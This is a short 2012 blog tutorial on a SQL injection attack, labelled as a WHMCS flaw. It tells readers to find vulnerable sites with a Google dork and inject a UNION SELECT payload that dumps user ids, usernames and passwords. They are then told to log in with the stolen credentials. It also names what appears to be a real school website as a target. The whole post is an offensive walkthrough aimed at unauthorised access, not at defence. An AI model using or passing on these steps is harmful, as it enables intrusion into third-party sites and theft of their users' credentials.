WHMCompleteSolution CMS sql Injection Vulnerability
Friday, July 13, 2012
By
I.D.A
Hello everyone!! Today im goin to tell you about WHMCS SQL Injection Vulnerablity. This is a very old vulnerability but still works.
So now lets beging:-
So now lets beging:-
- Firstly find a vulnerable site by using Google Dork:inurl:"weblink_cat_list.php?bcat_id="
- I have already one, url will be something like this http://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=1
- Then change the url from http://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=1 to http://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user .
- Bang !! All username as well as passwords will be shown. Now login with that credentials.
Second Step
http://www.senaprasit.ac.th/oldweb_kroobannok/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user
Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Written by CK Admins
Computer Korner is an open knowledge sharing site, where the we try to share our experience with IT, Security, Networking, System Administration tasks faced in day to day life. Articles from visitors are highly appreciated. Contact Us at : Click Here
![Admin Login Page Finder [FIND HIM]](http://3.bp.blogspot.com/-GhtWWRl4-xU/UB0hynJzAQI/AAAAAAAAAlA/7awzEtAFL0w/s72-c/mysqladded.PNG){kind=small}
0 comments: